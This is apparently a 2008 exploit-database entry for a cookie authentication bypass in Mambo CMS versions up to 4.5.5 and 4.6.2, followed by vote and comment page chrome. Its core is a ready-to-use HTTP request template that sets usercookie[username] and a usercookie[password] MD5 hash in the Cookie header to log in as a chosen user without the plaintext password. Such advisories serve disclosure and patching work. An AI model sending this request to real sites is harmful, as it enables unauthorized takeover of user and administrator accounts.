Mambo Cookie Authentication Bypass Exploit

2008.06.10

Credit: Halabaluza Team

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

for mambo <= 4.5.5 and <= 4.6.2 maybe others
GET http://[TARGET]/index.php
Host: [TARGET]
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b5)
Gecko/2008050509 Firefox/3.0b5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Connection: keep-alive
Cookie: usercookie[username]=[USERNAME];usercookie[password]=[MD5]
Cache-Control: max-age=0
FREE TIBET!

References:

http://seclists.org/fulldisclosure/2008/Jun/0115.html

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Mambo Cookie Authentication Bypass Exploit

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.